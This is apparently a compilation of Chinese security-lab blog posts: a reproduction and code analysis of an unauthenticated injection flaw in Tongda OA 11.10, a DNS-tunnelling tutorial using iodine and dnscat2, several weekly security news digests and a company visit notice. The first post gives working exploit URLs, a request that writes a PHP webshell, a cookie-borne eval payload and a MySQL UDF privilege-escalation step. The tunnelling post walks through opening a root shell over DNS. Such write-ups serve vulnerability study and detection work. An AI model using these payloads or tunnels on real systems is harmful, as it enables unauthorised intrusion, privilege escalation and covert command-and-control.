漏洞简介 之前也对通达 oa 做过比较具体的分析和漏洞挖掘，前几天看到通达 oa 11.10 存在未授权任意文件上传漏洞，于是也打算对此进行复现和分析。 环境搭建 https://www.tongda2000.com/download/p2019.php下载地址 ：https://cdndown.tongda2000.com/oa/2019/TDOA11.10.exe 查看版本信息 漏洞复现 利用方式一 http://192.168.222.128/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage 利用方式二 无法直接写入带有变量的 php 文件 所以首先利用 无参 webshell <?php @eval(next(getallheaders())); GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/MYOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage HTTP/1.1 Host: 192.168.222.128 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close 上传成功后再利用第一次生成的恶意文件再生成文件。 GET /general/test.php HTTP/1.1 Host: 192.168.121.147:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: file_put_contents('test1.php','<?php @eval($_REQUEST[1]);'); Content-Length: 28 Upgrade-Insecure-Requests: 1 但是无法直接直接命令，这是因为权限过低的原因 所以想要进一步的操作，就需要提权。 通过查看配置文件看到 mysql 数据库的密码。 利用蚁剑连接数据库。 查看 mysql 的版本。 SqlMap 中集成了对应的提权文件，不过需要先进行解密操作。 udf.dll的是经过编码运算的，所以需要有一个解密脚本，在这个路径下 sqlmap-master\extra\cloak 对应的 dll 文件路径 sqlmap-master\data\udf\mysql\windows\64 执行解码操作 cloak.py -d -i sqlmap-master\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_ 然后将解码好的文件上传到 mysql/lib/plugin/ 路径下 create function sys_eval returns string soname 'lib_mysqludf_sys.dll'; select sys_eval("whoami"); 漏洞分析 general\appbuilder\modules\portal\controllers\GatewayController.php#actionGetdata 首先判断是否存在参数 id 之后根据 module 的值依次执行 GetData与toUTF8方法。 general\appbuilder\modules\portal\models\PortalComponent.php#GetData 根据 id 查询，返回相对对应的数值 $activeTab 的值是从外部获取的。 根据不同的 $module 调用不同的get_data 方法 general\appbuilder\modules\portal\components\AppDesignComponents.php#data_analysis general\appbuilder\modules\appdesign\models\AppUtils.php#toUTF8 这里有一点类似于宽字节注入，利用类型的转换，使得传入的单引号转移后又被编码转换成汉字，最终使得单引号逃逸出来。最后实现命令执行。

1、新型APT组织Dark Pink持续攻击亚欧地区 https://www.group-ib.com/blog/dark-pink-episode-2/ Dark Pink是一个新发现的APT组织，它主要针对亚太地区和欧洲的政府和军事机构进行网络间谍活动。这个组织使用定制化的钓鱼邮件，携带恶意文档，利用Office的公式编辑器漏洞，向受害者的计算机中植入多种自制的恶意工具。这些工具包括一个定时扫描器，一个下载器，以及一个新型后门程序。 2、ApacheNiFi服务器被利用挖矿数据流管理平台遭受威胁 https://isc.sans.edu/diary/Your%20Business%20Data%20and%20Machine%20Learning%20at%20Risk%3A%20Attacks%20Against%20Apache%20NiFi/29900 Apache NiFi是一个开源的数据流管理平台，它可以用于收集、处理、分发和分析大量的数据。它也可以用于支持机器学习和人工智能的应用。然而，这个平台也存在一些安全漏洞，比如未授权访问、远程代码执行、跨站脚本等，这些漏洞可能被黑客利用，从而将Apache NiFi服务器纳入一个挖矿僵尸网络中。研究人员提供了一些实际的攻击案例，以 3、乌克兰CERT警告新一轮SmokeLoader攻击活动 https://cert.gov.ua/article/4755642 SmokeLoader是一个恶意软件加载器，它可以下载和执行其他恶意软件，比如银行木马、勒索软件、密码窃取器等。它也可以用于收集受害者的系统信息，并与远程服务器通信。乌克兰的计算机应急响应小组(CERT-UA)警告，SmokeLoader正在被一些黑客组织用于针对乌克兰和其他国家的攻击活动。这些黑客组织被认为与俄罗斯有关联。乌克兰CERT提供了一些实际的攻击案例，以及一些防御措施，比如使用强密码、启用双因素认证、限制网络访问、更新补丁等。 4、技嘉应用中心存在后门风险，影响数百款电脑 https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/ Eclypsium是一家专注于供应链安全的公司，它的平台最近在技嘉的电脑系统中发现了可疑的后门行为。经过进一步分析，发现这是技嘉的应用中心功能在UEFI固件中嵌入了一个Windows可执行文件，该文件在系统启动过程中被执行，并从互联网上不安全地下载和执行额外的有效载荷。这种后门行为可能会被恶意攻击者利用，从而导致供应链攻击、本地环境攻击或恶意软件持久化。Eclypsium已经与技嘉合作，寻求解决这个问题的方法。目前，建议受影响的用户关 5、BlackCat勒索软件升级隐蔽性、速度和数据窃取能力 https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/ BlackCat勒索软件是一种流行的网络威胁，也是勒索软件即服务(RaaS)模式的一个典型例子。它使用了不常见的编程语言(Rust)，可以攻击多种设备和操作系统，并与多个活跃的威胁行为组织有关联。BlackCat勒索软件的入侵和执行方式根据部署它的RaaS合作伙伴而不同，但结果都是一样的——目标数据被加密、窃取，并用于“双重勒索”，即攻击者威胁如果不支付赎金，就会公开泄露被盗数据。根据研究人员的分析， 6、丰田数据泄露再次暴露了司机的详细信息 https://cybernews.com/news/wildfires-cause-internet-outage-in-canada/ 丰田承认在不到三周的时间内发生了第二次数据泄露事件，汽车制造商暴露了司机的敏感细节，如姓名和家庭住址。 7、PixBankBot瞄准巴西的即时支付平台Pix https://thecyberexpress.com/pixbankbot-android-trojan-hits-brazil-app-pix/ Pix是一个快速便捷的即时支付平台，由该国货币当局巴西中央银行（BCB）开发和监督。 8、希腊教育部遭遇最严重网络攻击：全国考试被干扰 引发政治动荡 https://www.secrss.com/articles/55203 正值希腊全国高中期末考试，“学科库”国家题库平台遭到攻击，导致教师无法从题库平台抽取考题，部分考生不得不在教室等待数小时。 9、北京公交APP惊现诈骗广告 https://www.secrss.com/articles/55188 近日，有网友反映，其在使用北京公交APP时，遇到诈骗广告，该广告伪装成登录入口，十分隐蔽，稍不注意就会被扣29.8元。 10、梭子鱼邮件安全设备零日漏洞被利用长达七个月 https://www.secrss.com/articles/55238 网络和电子邮件安全公司梭子鱼（Barracuda Networks）本周三透露，其10天前修补的零日漏洞已被利用至少七个月，攻击者利用该漏洞在梭子鱼的大型企业客户的网络中投放恶意软件并窃取数据。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1.域名准备 选择哪家的云都没问题，国内云需要实名，不建议使用，这里我选择的TX云，因为之前注册过了，自己拿来做个流量分析不成问题 域名添加解析记录 需要准备自己的vps作为DNS隧道的服务端，且需要添加ns记录 2.iodined搭建 关闭53端口关闭开机自启 systemctl stop systemd-resolved systemctl disable systemd-resolved 之后53端口已关闭 启动服务端 iodined -f -c -P 1qaz@WSX 192.168.100.1 ns.xxx.xyz -DD 参数说明 -f：在前台运行 -c：禁止检查所有传入请求的客户端IP地址。 -P：客户端和服务端之间用于验证身份的密码。 -D：指定调试级别，-DD指第二级。“D”的数量随级别增加。 客户端 iodine -f -P 1qaz@WSX ns.aligoogle.xyz -M 200 客户端连接正常，且服务端显示客户端连接成功 查看客户端网卡，因为配置的时候一直不太稳定，所以这里服务端分配的虚拟网卡我更换为了192.168.121.1 测试隧道是否通信 延时比较高，也不稳定。 通过隧道连接目标主机 ssh -p 2222 root@192.168.121.2 这里我换ssh的端口了 但是发现安全设备在连接高危端口的时候无告警 3.流量分析 抓取dns0网卡的流量 tcpdump -i dns0 port 53 -w file.pcap 参数-i 指定网卡， port 指定端口，DNS使用53端口，-w 写入文件。 查看日志发现所有的流量都是DNS日志，但是目的都为自己的VPS 其实能够根据流量特征识别工具类型。 4.试错 本来我是想使用穿透工具通过隧道穿透的，这里使用nps做隧道走socks，想走虚拟网卡需要修改nps配置文件 ./npc -server=192.168.120.1:63323 -vkey=n4jg3lrvg19qlqth -type=tcp 查看nps上线后，需要做端口转发，不做端口转发无法直接使用虚拟地址的隧道,这里其实没有这么走的意义 但是这里发现行不通，参考了一些文章，发现某位师傅写的有点儿问题，这里大可不必，没有所谓的套层+转口转发，单一走隧道都不稳定以及卡的要死，怎么玩儿套娃。 5. dnscat2搭建 安装准备 git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server/ curl -sSL https://get.rvm.io | bash source /etc/profile.d/rvm.sh rvm install 2.6.0 source /etc/profile.d/rvm.sh rvm use 2.6.0 gem install bundler bundle install ruby ./dnscat2.rb 需要注意这里开放vps的53的udp端口 firewall-cmd --zone=public --add-port=53/udp --permanent firewall-cmd --reload 国内服务器TX云的话需要更换源，下载文件需要科学上网，境内下载tools找不到服务 客户端 git clone https://github.com/iagox86/dnscat2.git cd dnscat2/client/ make ./dnscat --dns server=IP,port=53 --secret=f361f307f523b07352d0bab1b765a888   //直连模式 ./dnscat --dns server=ling.domain --secret=1qaz2wsx             //中继模式 直连模式 Server: Client: 中继模式 ruby ./dnscat2.rb ns.domain -e open -c 1qaz2wsx --no-cache 客户端 ./dnscat --dns domain=ling.domain --secret=1qaz2wsx   ./dnscat --dns server=www.domain --secret=1qaz2wsx   服务端命令 sessions 列出所有session session -i 2 进入session 2 shell:创建交互式shell suspend:返回上一层 exit:退出 clear（清屏） delay（修改远程会话超时时间） exec（执行远程机上的程序） shell（得到一个反弹shell，此处必须在1::command(kali)中使用） download/upload（两端之间上传下载文件） listen <本地端口> <控制端IP/127.0.0.1>:<端口>（端口转发，此处）（此处必须在1::command(kali)中使用）dnscat2> session -i 1 New window created: 1 history_size (session) => 1000 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) This is a command session! That means you can enter a dnscat2 command such as 'ping'! For a full list of clients, try 'help'. command (ubuntu) 1> whoami Error: Unknown command: whoami command (ubuntu) 1> shell Sent request to execute a shell command (ubuntu) 1> New window created: 2 Shell session created! whoami Error: Unknown command: whoami command (ubuntu) 1> session -i 2 New window created: 2 history_size (session) => 1000 Session 2 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) This is a console session! That means that anything you type will be sent as-is to the client, and anything they type will be displayed as-is on the screen! If the client is executing a command and you don't see a prompt, try typing 'pwd' or something! To go back, type ctrl-z. sh (ubuntu) 2> whoami sh (ubuntu) 2> root tcpdump -i dns0 port 53 -w file.pcap 流量包内的数据内容 请求包和回包区别不大，在返回包多了域名的信息的TXT记录加密传输信息，可以看到DNS的查询请求的域名信息前的一串数据，里面就是加密过后的交互数据。 6 其它工具 跟工具关系不大，隧道的话DNS只要ip和域名没标签，其实走的都是udp的协议，所以在安全设备上都是流量数据，其类似的工具有dns2tcp等，但是总体来讲该隧道比较慢不稳定，比较慢且传输不支持大流量传输。

1、研究人员发现利用GoogleAds传播RomCom恶意软件的攻击活动 https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html 一项传播RomCom后门恶意软件的新活动正在冒充知名或虚构软件的网站，诱使用户下载并启动恶意安装程序。自2022年夏季以来一直关注RomCom的趋势科技发现了最新的活动。研究人员报告说，恶意软件背后的威胁行为者通过使用有效载荷加密和混淆来升级其规避，并通过引入新的强大命令来扩展该工具的功能。大多数用于向受害者分发RomCom的网站都涉及远程桌面管理应用程序，这增 2、WordPress插件“Gravity Forms”易受PHP对象注入攻击 https://www.bleepingcomputer.com/news/security/wordpress-plugin-gravity-forms-vulnerable-to-php-object-injection/ 目前有超过930000个网站使用的高级WordPress插件“Gravity Forms”容易受到未经身份验证的PHP对象注入攻击。Gravity Forms是一种自定义表单生成器网站所有者， 用于创建付款、注册、文件上传或访问者站点交互或交易所需的任何其他表单。在其网站上，Gravity Forms声称它被各种大公司使用，包括Airbnb、ESPN、耐克、NASA、 3、微软发现macOS漏洞可让黑客绕过SIP root限制 https://www.microsoft.com/en-us/security/blog/2023/05/30/new-macos-vulnerability-migraine-could-bypass-system-integrity-protection/ Apple最近解决了一个漏洞，该漏洞允许拥有root权限的攻击者绕过系统完整性保护(SIP)以安装“不可删除”的恶意软件并通过规避透明、同意和控制(TCC)安全检查来访问受害者的私人数据。该漏洞（称为Migraine）由一组Microsoft安全研究人员发现并报告给Apple，现在被追踪为CVE-2023-32369。系统完整性保护 4、WordPress强制在500万个站点上安装关键的Jetpack补丁 https://jetpack.com/blog/jetpack-12-1-1-critical-security-update/ 开源WordPress内容管理系统背后的公司Automattic今天开始在数百万网站上强制安装安全补丁，以解决Jetpack WordPress插件中的一个严重漏洞。Jetpack是一个非常受欢迎的插件，它提供免费的安全性、性能和网站管理改进，包括站点备份、暴力攻击保护、安全登录、恶意软件扫描等。 5、安卓、鸿蒙指纹识别曝安全漏洞，可无限次暴力破解 https://thehackernews.com/2023/05/new-bruteprint-attack-lets-attackers.html 该攻击方法被称为BrutePrint，通过利用智能手机指纹认证（SFA）框架中的两个零日漏洞，绕过身份验证。这两个漏洞分别为"匹配失败后取消"（CAMF）和 "匹配后锁定"（MAL）。 6、DogeRAT恶意软件正伪装流行APP针对印度安卓用户 https://thehackernews.com/2023/05/sneaky-dogerat-trojan-poses-as-popular.html 作为复杂恶意软件活动的一部分，一种名为DogeRAT的新型开源远程访问木马 (RAT)针对主要位于印度的 Android 用户。 7、GobRAT RAT恶意软件以日本的Linux路由器为目标 https://securityaffairs.com/146795/malware/gobrat-targets-routers-japan.html JPCERT 协调中心警告称，一种名为 GobRAT 的新型 Golang 远程访问木马 (RAT) 正以日本的 Linux 路由器为目标。 8、Palantir演示军队如何利用“ChatGPT”进行作战 https://www.secrss.com/articles/55156 Palantir正在推出Palantir人工智能平台（AIP），该软件旨在运行GPT-4等大型语言模型和专用网络上的替代方案。在其中一个宣传视频中，Palantir演示了军队如何使用AIP进行作战。 9、专利钓饵公司针对开源项目的攻击猛增了100% https://www.4hou.com/posts/XVwm 近年来，专利钓饵公司（patent troll，又译专利流氓）开始攻击众多开源开发人员和公司，但开源社区正在奋力反击。 10、技嘉系统中的关键固件漏洞影响约700万台设备 https://thehackernews.com/2023/05/critical-firmware-vulnerability-in.html 网络安全研究人员在技嘉系统中发现了“类似后门的行为”，他们说这使得设备的UEFI固件能够删除Windows可执行文件并以不安全的格式检索更新。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、黑客论坛RaidForums近50万成员数据被泄露 https://www.bleepingcomputer.com/news/security/new-hacking-forum-leaks-data-of-478-000-raidforums-members/ RaidForums黑客论坛的数据库已在线泄露，使威胁行为者和安全研究人员能够深入了解经常光顾该论坛的人。RaidForums是一个非常流行且臭名昭著的黑客和数据泄露论坛，以托管、泄露和出售从被入侵组织窃取的数据而闻名。 2、Salt Security发现Expo Framework中的关键安全漏洞 https://salt.security/blog/a-new-oauth-vulnerability-that-may-impact-hundreds-of-online-services Salt Security的安全研究人员发现，用于数百线上服务的知名开发框架Expo出现可劫持账号的重大漏洞。这些漏洞是在Expo使用的开放授权(OAuth)社交登录功能的实施中发现的，它有可能影响任何通过Facebook、Google、Apple和Twitter帐户使用Expo框架登录在线服务的用户。 3、基于Arbitrum的DeFi项目Jimbos Protocol遭遇闪电贷攻击 https://www.bleepingcomputer.com/news/security/flash-loan-attack-on-jimbos-protocol-steals-over-75-million/ 于Arbitrum的DeFi项目Jimbos Protocol遭受闪电贷攻击，导致超过4000个ETH代币丢失，目前价值超过7500000美元。该公司昨天在Twitter上披露了此次攻击事件，称已通知执法部门，并正在与安全专业人员合作进行补救。攻击发生在该平台启动其V2协议仅三天后，当时许多人刚刚投资其“jimbo”代币，犯罪者设法窃取了4090个ETH代币。jimbo代币具有由 4、新型浏览器文件压缩包可滥用ZIP 域名传播恶意软件 https://www.bleepingcomputer.com/news/security/clever-file-archiver-in-the-browser-phishing-trick-uses-zip-domains/ 一种新型"浏览器文件压缩包 "钓鱼工具被试验出可滥用ZIP域名，在浏览器中显示虚假的WinRAR或Windows文件资源管理器窗口，以诱导用户启动恶意文件。 5、俄军嫂邮箱遭乌破解：GRU下属军事单位26165负责人遭曝光 https://www.secrss.com/articles/55106 通过入侵并控制军人家属--军嫂的电子邮箱，进而对关键军方人物进行信息挖掘并曝光，这是乌克兰黑客组织和InformNapalm情报社区的惯用手段。 6、MCNA 泄露了 890 万用户的敏感信息 https://www.freebuf.com/news/367947.html Bleeping Computer 网站披露，北美 MCNA 牙科公司在其网站上发布一份数据泄露告示，通知近 900 万患者个人数据泄露了。（MCNA 牙科是美国最大的牙科护理和口腔健康保险提供商之一。） 7、含SpinOk恶意模块的应用在GooglePlay被安装了4.21亿次 https://www.bleepingcomputer.com/news/security/android-apps-with-spyware-installed-421-million-times-from-google-play/ 在多个应用程序中发现了一种新的Android恶意软件，作为广告SDK分发，其中许多以前在Google Play上，下载量超过4亿次。Dr. Web的安全研究人员发现了间谍软件模块，并将其跟踪为“SpinOk”，警告它可以窃取存储在用户设备上的私人数据并将其发送到远程服务器。 8、PrinterLogic Enterprise 软件中被发现多个漏洞 https://www.securityweek.com/many-vulnerabilities-found-in-printerlogic-enterprise-software/ 在PrinterLogic的企业管理打印机解决方案中发现的漏洞可能会使组织面临身份验证绕过，SQL注入，跨站点脚本（XSS）和其他类型的攻击。 9、研究人员报告了Sonos One扬声器中的关键安全漏洞 https://thehackernews.com/2023/05/hackers-win-105000-for-reporting.html Sonos One无线扬声器中发现的多个安全漏洞可能被潜在地利用来实现信息泄露和远程代码执行，ZDI在上周发布的一份报告中表示。 10、信安标委发布《网络数据安全风险评估实施指引》 https://www.freebuf.com/news/368020.html 《评估指引》适用于指导数据处理者、第三方机构开展风险评估，也可为有关主管监管部门组织开展数据安全检查评估提供参考。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、QBot恶意软件利用Windows 10写字板程序感染计算机 https://www.sentinelone.com/labs/operation-magalenha-long-running-campaign-pursues-portuguese-credentials-and-pii/ QBot恶意软件行动已开始利用Windows 10写字板程序中的DLL劫持漏洞感染计算机，利用合法程序逃避安全软件的检测。DLL是一种库文件，其中包含可同时被多个程序使用的函数。 2、瑞士大型跨国企业ABB确认遭受勒索软件攻击、数据盗窃 https://www.bleepingcomputer.com/news/security/us-govt-contractor-abb-confirms-ransomware-attack-data-theft/ 瑞士大型跨国企业ABB已确认其部分系统受到勒索软件攻击的影响，此前该公司将其描述为“IT安全事件”。它还透露，攻击者从受感染的设备中窃取了数据，如果他们的信息在事件中受到影响，它将通知受影响的个人。 3、GitLab强烈建议尽快修补最高严重性漏洞 https://www.bleepingcomputer.com/news/security/gitlab-strongly-recommends-patching-max-severity-flaw-asap/ GitLab已发布紧急安全更新版本16.0.1，以解决被跟踪为CVE-2023-2825的最高严重性（CVSS v3.1 分数：10.0）路径遍历缺陷。GitLab是一个基于Web的Git存储库，面向需要远程管理其代码的开发团队，拥有大约3000万注册用户和100万付费客户。 4、CISA警告政府机构注意最近修补的Barracuda零日漏洞 https://www.bleepingcomputer.com/news/security/cisa-warns-govt-agencies-of-recently-patched-barracuda-zero-day/ CISA警告称，上周有人利用最近修补的零日漏洞入侵Barracuda电子邮件安全网关(ESG)设备。Barracuda表示，其安全解决方案已被全球超过200000家组织使用，其中包括三星、三菱、卡夫亨氏和达美航空等知名公司。 5、Dark Frost僵尸网络针对游戏公司和游戏社区成员发起攻击 https://www.hackread.com/gaming-firms-community-dark-frost-botnet/ Web基础设施公司Akamai的安全情报响应团队发现了一个新的僵尸网络，该僵尸网络针对游戏行业进行DDoS攻击。Akamai安全研究员Allen West解释说，他们将这个僵尸网络命名为Dark Frost。 6、新出现的窃密木马Bandit Stealer以浏览器、钱包为目标 https://www.trendmicro.com/en_ca/research/23/e/new-info-stealer-bandit-stealer-targets-browsers-wallets.html 一种名为Bandit Stealer的新出现的信息窃取恶意软件越来越受欢迎，因为它以众多浏览器和加密货币钱包为目标，同时逃避检测。目前，恶意软件社区内的兴趣和宣传活动越来越多，以提高对恶意软件的认识和使用。 7、研究人员发现针对Linux路由器攻击的GobRAT恶意软件 https://blogs.jpcert.or.jp/en/2023/05/gobrat.html JPCERT/CC已确认攻击者在2023年2月左右用恶意软件感染了日本的路由器。攻击者首先针对一个WEBUI对外开放的路由器，利用漏洞执行脚本，最终感染GobRAT。Loader Script作为加载器，包含生成各种脚本、下载GobRAT等功能。假定用于后门的SSH公钥硬编码在脚本中。另外，由于Loader Script使用crontab来注册Start Script的文件路径进行持久化，所以GobRAT没有这个功能。该脚本的独特之处在于它将启动时间写入名为restart.log的文件。此外， 8、研究员开发了一个利用ZIP域的网络钓鱼工具包 https://www.bleepingcomputer.com/news/security/clever-file-archiver-in-the-browser-phishing-trick-uses-zip-domains/ 一种新的“浏览器中的文件存档器”网络钓鱼工具包通过在浏览器中显示伪造的WinRAR或Windows文件资源管理器窗口来诱使用户启动恶意文件。本月早些时候， 谷歌开始提供注册ZIP TLD域的功能，例如bleepingcomputer.zip，用于托管网站或电子邮件地址。自TLD发布以来， 关于它们是否是一个错误并可能对用户构成网络安全风险的争论一直存在。安全研究员 9、PyPI宣布对所有软件发布者强制使用2FA https://www.bleepingcomputer.com/news/security/pypi-announces-mandatory-use-of-2fa-for-all-software-publishers/ Python Package Index(PyPI)宣布将要求在该平台上管理项目的每个帐户在年底前启用双因素身份验证(2FA)。PyPI是用Python编程语言创建的软件包的软件存储库。该索引托管了200000个包，使开发人员可以找到满足各种项目需求的现有包，从而节省他们的时间和精力。PyPI团队表示，对所有帐户强制执行2FA的决定是他们增强平台安全性的长期承诺的一部分， 10、超 100 GB！特斯拉曝数据泄露丑闻 https://jalopnik.com/whistleblower-drops-100-gigabytes-of-tesla-secrets-to-g-1850476542 2021 年 12 月，一名拥有俄罗斯 IP 地址的用户向谷歌的病毒扫描服务 VirusTotal 上传了神秘的恶意软件据研究，这是一种新的俄罗斯运营技术恶意软件可能会导致欧洲、中东和亚洲的电力中断。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、朝鲜黑客组织Lazarus攻击微软IIS服务器 https://securityaffairs.com/146639/hacking/lazarus-targets-microsoft-iis-servers.html 与朝鲜有关联的APT(高级可持续性威胁)组织Lazarus团伙，近期针对微软IIS(互联网信息服务)的服务器发动攻击，利用一个名为NukeSped的恶意软件家族，窃取敏感数据和加密货币。该恶意软件家族包括一个后门程序和一个木马程序，可以执行远程命令、上传和下载文件、收集系统信息、截屏、记录键盘输入等恶意行为。 2、俄罗斯OT恶意软件CosmicEnergy威胁电力系统 https://www.govinfosecurity.com/new-russian-ot-malware-could-wreak-havoc-on-electric-systems-a-22166 一种新的俄罗斯操作技术(OT)恶意软件，可能会导致欧洲、中东和亚洲的电力中断。这种恶意软件被威胁情报公司称为“CosmicEnergy”，它通过与电力系统自动化设备(如远程终端单元)交互，造成破坏。研究人员发现，CosmicEnergy是在2023年1月至4月期间被部署的，目标是一些位于欧洲、中东和亚洲的电力公司。 3、网络钓鱼活动针对ChatGPT用户 https://www.helpnetsecurity.com/2023/05/25/chatgpt-phishing/ 一种巧妙的网络钓鱼活动试图通过冒充OpenAI公司来窃取用户的商业电子邮件账户凭证，OpenAI公司是ChatGPT聊天机器人的开发者。这种钓鱼活动的第一阶段是受害者收到一封看起来合法的电子邮件，声称是由OpenAI公司发送的。 4、德国检查官起诉FinFisher间谍软件高管 https://www.govinfosecurity.com/german-prosecutors-indict-finfisher-spyware-executives-a-22174 德国检察官周一起诉了四名破产的商业间谍软件公司FinFisher的高管，指控他们非法将他们的黑客工具出口到土耳其。起诉书指控四名FinFisher高管故意违反了对双用途商品的出口许可要求，将监视软件出售给非欧盟国家。 5、研究人员披露针对30家葡萄牙银行凭证的“Magalenha行动” https://www.bleepingcomputer.com/news/security/operation-magalenha-targets-credentials-of-30-portuguese-banks/ 自2021年以来，一个巴西黑客组织一直以30家葡萄牙政府和私人金融机构为目标，发起了一场名为“Magalenha行动”的恶意活动。目标主要包括ActivoBank、Caixa Geral de Depósitos、CaixaBank、Citibanamex、Santander、Millennium BCP、ING、Banco BPI和Novobanco。 6、Zyxel警告防火墙和VPN设备存在严重漏洞 https://www.bleepingcomputer.com/news/security/zyxel-warns-of-critical-vulnerabilities-in-firewall-and-vpn-devices/ Zyxel警告客户其数款防火墙和VPN产品中存在两个严重漏洞，攻击者无需身份验证即可利用这些漏洞。这两个安全问题都是缓冲区溢出，并可能允许在易受攻击的设备上执行拒绝服务(DoS)和远程代码。 7、D-Link修复了D-View 8软件中的身份验证绕过和RCE漏洞 https://www.bleepingcomputer.com/news/security/d-link-fixes-auth-bypass-and-rce-flaws-in-d-view-8-software/ D-Link已修复其D-View 8网络管理套件中的两个严重漏洞，该漏洞可能允许远程攻击者绕过身份验证并执行任意代码。D-View是由台湾网络解决方案供应商D-Link开发的网络管理套件，各种规模的企业都使用它来监控性能、控制设备配置、创建网络地图，并通常使网络管理和管理更高效、更省时消费。 8、研究人员开发了一种名为“热像素”的新型攻击 https://www.bleepingcomputer.com/news/security/hot-pixels-attack-checks-cpu-temp-power-changes-to-steal-data/ 佐治亚理工学院、密歇根大学和波鸿鲁尔大学的一组研究人员开发了一种名为“热像素”的新型攻击，它可以从目标浏览器中显示的内容中检索像素并推断导航历史。该攻击利用现代片上系统(SoC)和图形处理单元(GPU)上的数据相关计算时间，并应用它们从Chrome和Safari上访问过的网页中偷偷提取信息。研究人员发现，现代处理器难以在功耗要求和散热限制与高执行速度之间取得平衡。这导致指向特 9、Emby关闭了在最近的攻击中被黑的用户媒体服务器 https://www.bleepingcomputer.com/news/security/emby-shuts-down-user-media-servers-hacked-in-recent-attack/ Emby 表示，它远程关闭了数量不详的用户托管媒体服务器实例，这些实例最近因利用先前已知的漏洞和不安全的管理员帐户配置而遭到黑客攻击。 10、QBot恶意软件利用Windows 10写字板程序感染计算机 https://www.sentinelone.com/labs/operation-magalenha-long-running-campaign-pursues-portuguese-credentials-and-pii/ QBot恶意软件行动已开始利用Windows 10写字板程序中的DLL劫持漏洞感染计算机，利用合法程序逃避安全软件的检测。DLL是一种库文件，其中包含可同时被多个程序使用的函数。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

2023年5月24日，湖南工程学院计算机与通信学院院长唐志航一行来访湖南蚁景科技有限公司，蚁景科技副总经理皮开元、销售部负责人宋小玲进行了接待，双方就进一步加强合作展开了深入沟通和探讨。 沟通会上，唐院长首先介绍了此次来访的三个方面需求，包括开展一流网络安全院系建设工作、提升学生就业率和校企合作。希望我司能够提供支持，促进学校和企业的共同发展。   针对学校的这一系列需求，蚁景科技皮开元表示，蚁景科技将全力支持学校的发展，积极拓展合作领域。 蚁景科技旗下在线实验平台-蚁景网安实验室，现已形成成熟的学、训、赛三大体系；全方位覆盖了网络安全领域包括Web安全、渗透测试、CTF网络攻防、信息安全管理等1500+内容。丰富的课件库、快捷方便的教学环境、科学的知识图谱、清晰的学习路径，结合蚁景科技与各大高校开展实习实训的丰富经验，能为院校实习实训工作开展与教师网安教学效率的提升提供有力支持。 除蚁景网安实验室以外，蚁景网安学院推出的网安实战技能培训课程，紧密贴合网安行业人才市场需求，助力学员在职场竞争中脱颖而出，欢迎更多学子参与进来。 会后，湖南工程学院领导一行表达了对蚁景科技的高度认可，双方表示将继续保持紧密的联系和合作，力求在网络安全领域取得显著的合作成果！

